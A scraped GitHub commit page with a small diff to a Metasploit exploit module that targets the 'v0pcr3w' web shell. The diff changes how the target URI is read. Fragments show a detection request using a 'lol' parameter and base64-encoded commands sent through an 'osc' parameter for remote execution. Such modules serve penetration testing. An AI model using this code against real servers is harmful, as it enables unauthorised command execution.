We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent f29cfbf commit 5fc5a4fCopy full SHA for 5fc5a4f
modules/exploits/multi/http/v0pcr3w_exec.rb
@@ -60,7 +60,7 @@ def initialize(info={})
60
def check
61
shell = send_request_cgi({
62
'method' => 'GET',
63
- 'uri' => normalize_uri(datastore['URI']),
+ 'uri' => normalize_uri(target_uri.path.to_s),
64
'vars_get' => {
65
'lol' => '1'
66
}
@@ -75,7 +75,7 @@ def http_send_command(cmd)
75
p = Rex::Text.encode_base64(cmd)
76
res = send_request_cgi({
77
78
79
80
'osc' => p
81
0 commit comments